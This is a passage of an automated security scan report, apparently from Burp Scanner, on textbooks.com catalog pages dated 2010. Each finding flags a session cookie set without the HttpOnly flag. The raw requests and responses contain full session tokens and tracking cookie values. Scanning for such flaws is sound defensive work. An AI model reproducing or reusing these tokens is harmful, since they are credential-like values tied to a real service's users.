4.10. http://www.textbooks.com/Catalog/E/Education.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/E/Education.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/E/Education.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:12 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=%2BQT15syJFQpHp4dFG2eEpo5qhhxrN2NnXXojj%2B6vsjDlYwicebgGKOemaZwFuSpLGvERyDHJVrsOrpxCJqN516%2BVeigWN4CS52D%2ByFKeR9WqZXy2L93y1y0TTO%2FL02RMH3uE%2BkLM%2BDcTNSUgBGZyH95BMfWeoAzQs84E%2FN7tGPt7Fo0%2FhGQXKH0Q4G6Cwsv%2FNG7Ob7nyAy35Uay7WCIeTwknULTbN%2FHUrk0hmZi4EPkDKYy2miATcF2at%2FEsSO%2Fh1aVHxX2bKd5JenPNus0Tz0rHunwBvQRiIvOgX7KZdX%2BHieokPD%2BoevYGCabIOYnf47QzxWcbpCDnFVy%2BsRuNSNs3mMqT7k874RW0eZjFlmWEhBugfSwAR4nkFAXDQRZNqh8j9pZRXUOQCkFmQlEYrtJvrHZn0zj3uD9xH3sYcfy%2BSWUA%2FuGBxR9sNfqptweYYHDl4BY%2FVFhp97YXQ8Droky5fLCjVzc9xQrg82zPbc4tFVr1dLHFnDWamU6K1S0SrMwg%2FxYhK6Sx9yFUWsJRaFoj3Qn%2F80uOExnjGTTjcTd5qeqIdtxeTXDrc4PW7jrbB1%2BQf2Wpl8ja6dfhfhivhkSzKz5N55%2FOhwjl%2F7YXkfLIXv7QPZaDNaq3SASKNJBu1xaXoSdAp9zM%2B8WmxFGTHyb7BpSbx5gMxFsiMkQV%2FL5Le3M%2FaafjDNA8PJq7Z99F6Zw%2BnpQcZhZQoEarCEvnS9ZfOWQAxvEQ4RweR3i89Bba0LaEFdXa5WCAIuVwBg4mfSyjTfZQt1tIGM1q9m7ysaQqTNXIvivO4J1ILWGGHSgR5b34W20AWIBqC0%2B896S7nEXQzjMQA%2BEXtjQEO7k0UHW7YgbhQ345%2BIQilKuOxIJ9ifPgdJ2RpatlyzzW0x2CpA5BDE20evC4XQ1eO8uzlhKeXahsVWmYCDdp8mHm4Bb0hIMR5NSuZ7hD141zoqZ9fybUepYslfVHvcBsV%2F%2BEKepgQk3TpdEK4n26hoYBrZhR%2FpQ5GT3zgqiLdc5hldzuMLsT4%2Fmo9k%2BNZwqUZxXImfhbYAeIxadx0stzmiEdhIk9NRByVIv%2Bo%2B3zRlm5GS8DnsafkElC00Kyts9uRmQJjcwB8ELdqqD8jOy33w%2Fix6Spz%2FA5y2ziEUpkiomtan%2ByRTsRv7Cuz3Plqgqc%2FSIupUZ33THHanyIBH7T9%2FkPdgiTn1xA7gaYMSFCFIBgz%2Bim29x9J6B9UikJiji9arLw8%2F2p2jlGL0iFJUNVpZBaKDSXyul5fL8M9wruriM%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=VAA7TauIvNb3MpIV8EI%3D; expires=Mon, 26-Dec-2011 13:52:11 GMT; path=/; domain=.textbooks.com
Content-Length: 151328


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.11. http://www.textbooks.com/Catalog/G/History-and-Geography.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/G/History-and-Geography.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/G/History-and-Geography.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:13 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=u4V8YIRyYL1qO4cc8fpVBN8aXViG6zrMpu4wwzHQO52nr75S18JR3wKQDG%2F6HdqSbW4QUkr6KiMnTT4MmbRKlUQSFjq6uU3fuHi%2F%2F%2B1nt5MYKWVtEeGH8W2wV4XngH%2Ff4lGCyucp6LeVoYeLEofcQA8ORsuJ4%2BZlAMCevKHfwXSIBMuwcAG1G6rc8mX5srtdVcxAbu2Pvhoy%2BAr0sCOSeF5KF5Q54NDD66XMH7Y3YkmzCl4frseROWYqKlQIgkD1kJpaSayC2LcLtT1lZNhwIx%2FuaGnlhmC0s5sdvU66mrNOgAb50i9UDyDhtKUpqZxrF6oFkYLy1HiWoFx%2FhIrHwtR4WPgJFjC6UhOli9xNtmX3A6oqHGg%2FOuQv8USiVnjCgMTH3DgWXMUxjk1Ey9VgyIVJIMXQszvslZZ8c270r1Adqb%2FAtxDq0A6wHTf8n3PDxyOm1m%2BjbwSIIvfqAk3mSwHKKmRUxaRBpHr81XujCMTywdm9dCPL%2F0dEIKvQI0WJqDyAaglAAlbrthQfdIy9XKLroe9up673OqxDIgzlk7s5sKttSe8TH6zVmVU7UqU7hDeCBxUuLdxI9vXbqVZc2Fi7UMGO37sYeDZOxZdn4k%2Bt04W%2FN2XAskn%2Fnvw7m1ad6DDJ9H8%2FCZYIkykJNGBhg6dwezBCGDofHtcbcF3Ehqb1EIH5Y628zbdHjQAIzsWfKVg8910UAqVKx3FAQ1HxBGWu1p6fbO8ndZFdZBB%2FxRaJP6EdY0l48AOFB%2FgoZWmBej9U%2FYUL1lgF7B87JI%2FUO9%2F2Ri1ZAB9ENerR9zTLfGx7plZOUxM9cY5r96eYdqckWAi5inVnfyr9OAHoqvbEBrSg76ev9bg3bd7eELRwL9ZvrBxDrW9XKM41kzvvWzTLnlaIuMGgRT4gHTAl0h0dgylxaCwTzgdD0vIkDr9man%2FDvb1ehOIWMlhIGIz3MGb8WpYNNAMTX4r3MUO7AVfRzCL4haFO8M2ZdTDrz7Quii7Jf1h2irNSWvMSKj71pA7kVeQV%2FgAHLKsO%2B89PsBn4WC80sJWEsYVbn32qVgmh%2BoG%2BGf1FfTXkQ2lsUO%2FRGds6G0xpXtg54cIBUT8hiw0h26dhQnukxU0GOD2Z%2F%2BPiEf9SB2m3qjcN31ldmJlWTRqbHmSPvLZ9HTaJoqXCEw3FV7lXDFn5bX9SALvMeadgshk27xxwvii2z3PQDJYqIkD1RqBGOLY14ZLiE6Y2ga4ySSogX9FhoPWy9b90UQ%2FIyhoi6SzJZ7hjRqilfBU%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=2BZ3dFHzZbVUm9u%2FkwQ%3D; expires=Mon, 26-Dec-2011 13:52:13 GMT; path=/; domain=.textbooks.com
Content-Length: 140644


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.12. http://www.textbooks.com/Catalog/H/Arts-and-Humanities.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/H/Arts-and-Humanities.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/H/Arts-and-Humanities.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=6V6EGlHQRxeAYbzR8BD2Ib8Qdgrfw3njQmVZvpDHAaePV5%2FK6uG%2FoYHwgrYH0NbA9YRZXSWe55LoQiGKWi6KqREPPF5DwHlcNi0m8TGz7jleQcL1fsofYmMDSkhAFxwpaU9BcRoL9Jk1AVRjFpDF8%2FoOMwuoSxLWC%2FwknQLEuqHx3PvBbhFhGpgCqJWIe0Wr258LN%2BtKQtawmWP9xBvwGVYxaTTa3EzQMFIAwUZWhtpdV12HX0olp4YHSbETuruOWeL8f2HaAAFn1wKokujAsqh103pve0%2BqC44alxL549tkMvLkemBBX9XXudTrpZ3FidTlw8BdPh1HXyDBT6%2FhdF5uObdhNuxLVgHtP5WjjJVbCaGLR%2FVJeYRqG3hpEpeeJZN72hde4v1qVSht5U6MW6FpgoA22Usf1TIRfeAtlbdPEmXvshzsrybaMPdk70JZCQRC6Hp%2FgegUvLoDUmbgLWLzHX5XFcWOjK1w8qGasIh54wf3tC9iZ1YOvLGNCbdIIrjbj3hZeVB3pExWYPLkLnnbmMQixT9VbfrmiJuzUZyi7saFXFOQDx8fLGlMJecKi55%2BNv5IFXAP5XcHu%2FKFOYEpFB%2Ft0bIbAVb3mtdsuqESLdRFJRKpXxJ72pnceOt0koeUeG%2B0xchjjdc0WU894eTtzhi1GltfGgx7xa5W9McPSyLRnxsV0UeOiwdphcZfQXOV19efAzNtwZNeW%2FMm3T1GS64zIf403O%2FhgJ306hHrFKOmPd%2F5rS3fsbHJBTc6ViWCckTG04YXCuKqMBoANsW5FGN8u%2BjPUXRZiZ%2B92Mv61N7KDqOzYec6w0W4UvTwLoYPZ%2FQZYwQ5Jb9FPAZG4wvonVHgzXUsjsxWbZc4mS7IDQsSoEBp2UqOCs1nTNuYMKwctmQHCCqThti8nZWzFlXhOnZo8v7BDfAo%2BSRo1SO6fYDMZhCqgp0zgVIAFKIVwnc6nstSFDJt7DexP6XBQHJ9jU6FUEIxzFRzm3bEBU4rBtGhdCDB1oT2zzP%2BZ0uWl5N5GmBsUqfBo2Plmoj9i%2Bg2%2FlBXFffXn55MOhLfr9APP2MfUIVDuQeTOz6KBcJbFaF2lWoiqaRPyIddpxu1mRwQbrZrQHxeyz3gx%2Fn%2FksVaubH%2Bpb9K0JfRxlFSK%2B0XCeLVMY3lF8VhhTPNzCC0hKkOqb3Mm3umEziRmXy%2FkHgx%2BRFEpbjbaDZy16xInpJlSgQymNz5Ig64Z6J%2BMmyqciEwyrCt61VtFRAqXto3MGZ7tsHD0FW1aZnZIyQ%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=DCFkgYROO8MBmmRupNk%3D; expires=Mon, 26-Dec-2011 13:52:02 GMT; path=/; domain=.textbooks.com
Content-Length: 107266


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.13. http://www.textbooks.com/Catalog/HQL/General-Video-Titles.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/HQL/General-Video-Titles.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/HQL/General-Video-Titles.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=wVCAnSNMnugJPpqPvFnYLMkeWndthnmqOhEEEMhiZx7wwIrip2hgQbExDho5rACzBkbkz%2B3tboQXXlEDqY88uSi9toJS5amCgvJPhU4%2B6u9GSdi8%2BPyG%2FPHQvDdA4iaiM3q14eVdOOwqGm9iho7gvHyDXRxe4e8yVF5u%2BLLtpF%2BNU9xtvy8uIaYtSKwPHOXe95vJZ2sxZ61yI4Vil5U6Xm6KDiMccJ5ge%2B9E9bjkdpVc0NujtdUwLCCL3z47t7PtcP4msfxpne4hgQ%2FYWGoFG9MoHHDeLG6luMmQtuxDrxl3MR9%2FAtb4xeckgUoU44e9SBigB344iGRmTf%2BtNjNfC0ykRdE6VebMxy6jhHj9gJBJsgt2ntC713Paqp3C%2FJAUgP0Br3ythzZAz7D6iFMtMNBzDo4Fl4xEuitZ2lOR7sXmQietPoNi1WISNuxDA3icHt1jTdPegalrRpEOjCmezWLHTNmCa0b1Qyr4ttsiU0p57ceZSAYRXXLoKMcL0zlkYnxPefNKQEVldegCt8IiE3D6VSetpkpM0C%2Fw9uwRe1L%2BeeaNNQZOCg1UmKrg92X8Nq3rzRqwZ48mZ8FbhxwZmmYSH44A9%2BSsUgoj6D4d4acf2cz2kIKi%2B8jLdUfP%2B0Ps6wpjtrbRhL%2FLDs7FEVzfy2BgzumkfGlb%2Bdc4cX3MrlwJNwTUp2qBlPFz8yAEmKxgET5qgaqGUPyX9U%2BMyc8kDwxtK5wyU%2FY1AQEzWn6WaFz%2Fe2iFwZKmDXUKmphRky1llznv%2BlpxbUSqLjBMUGG0scgpl5cZM3yhD7J0OKv4N%2BYEXkTZEFCHS5nkl%2BOo4FouixU%2BYQdKUi%2BmVxi%2BUvD9w1aYsjz6%2BNoMycuC4w%2BeDttlVLzyrLIjJq%2FibjXg72tvZAHkgRCGVL79zhZdj%2BNJxB%2BdE%2BD063jHaMboSA00YzWTOxLBG0Y1T0FI3DDr945czdlm%2FhXsxYdsUWGBE78jwuCvv4uyrPPUy2MSA0%2BY3S%2BQbz1HW7RDjRpTR%2Bu8iklBcRjxymy2ni4%2BibkO%2FBu%2B%2FEg2YATkLrcAwAvPMsssQFrbB%2FBZknDBAdfO%2FeIGdcFruitxdNw%2BBgS9C4Yem0urLAM1Ufx98XKKFEOg6KItVaExFRTJpUJBDEx3e9izECdNY5EJz2AdN3BbCdgCVZCjIlD78CQcgQQljR6vOrpi8pYFeBJ7t9G0rvLfZdyljwoeXFt0xiVNXwNwwb6U2hZEewgXRtwsR%2FYbzDj2xs%2Fx2V2q%2Fz9nRSUpCrtZ%2FMw%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=H2iNa2p5mG9uGr594ec%3D; expires=Mon, 26-Dec-2011 13:52:01 GMT; path=/; domain=.textbooks.com
Content-Length: 125397


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.14. http://www.textbooks.com/Catalog/J/Law-and-Criminal-Justice.php  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/J/Law-and-Criminal-Justice.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/J/Law-and-Criminal-Justice.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; 